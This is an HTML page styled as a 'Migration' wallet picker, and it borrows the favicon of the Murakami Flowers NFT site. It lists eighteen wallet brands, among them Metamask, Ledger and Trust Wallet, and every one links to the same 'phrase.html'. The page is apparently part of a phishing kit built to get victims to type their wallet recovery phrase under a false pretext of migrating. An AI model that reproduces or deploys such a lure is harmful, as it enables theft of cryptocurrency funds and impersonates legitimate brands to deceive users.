<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Migration || Choose a Wallet</title>
    <link
      rel="icon"
      href="https://murakamiflowers.kaikaikiki.com/favicon.ico">
    <link rel="stylesheet" href="styles.css" />
  </head>
  <body class="walletbody">
    <div class="page-container">
      <div class="back-button"><a href="./index.html"> &#8592; </a></div>
      <div class="content">
        <div class="steps">
          <span class="step active">Step 1</span>
          <span class="step">Step 2</span>
          <span class="step">Step 3</span>
        </div>
        <h1>Select your wallet</h1>
        <div class="wallet-list">
          <a class="wallet-item" href="./phrase.html"
            ><div>Metamask</div></a
          >
          <a class="wallet-item" href="./phrase.html"
            ><div>Rabby Wallet</div></a
          >
          <a class="wallet-item" href="./phrase.html"
            ><div>OKX</div></a
          >
          <a class="wallet-item" href="./phrase.html"
            ><div>OneKey</div></a
          ><a class="wallet-item" href="./phrase.html"
            ><div>Bitget Wallet</div></a
          ><a class="wallet-item" href="./phrase.html"
            ><div>Keystone Wallet</div></a
          >
          <a class="wallet-item" href="./phrase.html"
            ><div>Trust Wallet</div></a
          >
          <a class="wallet-item" href="./phrase.html"
            ><div>Ledger Wallet</div></a
          >
          <a class="wallet-item" href="./phrase.html"
            ><div>ImToken </div></a
          >
          <a class="wallet-item" href="./phrase.html"
            ><div>Keplr Wallet</div></a
          >
          <a class="wallet-item" href="./phrase.html"
            ><div>Coinbase Wallet</div></a
          >
          <a class="wallet-item" href="./phrase.html"
            ><div>Safepal Wallet</div></a
          >
          <a class="wallet-item" href="./phrase.html"
            ><div>Binance Wallet</div></a
          >
          <a class="wallet-item" href="./phrase.html"><div>OKX Wallet</div></a>
          <a class="wallet-item" href="./phrase.html"
            ><div>Solana Wallet</div></a
          >
          <a class="wallet-item" href="./phrase.html"
            ><div>Blockchain Wallet</div></a
          >
          <a class="wallet-item" href="./phrase.html"
            ><div>Tangem Wallet</div></a
          >
          <a class="wallet-item" href="./phrase.html"
            ><div>Other Wallets</div></a
          >
        </div>
      </div>
    </div>
  </body>
</html>
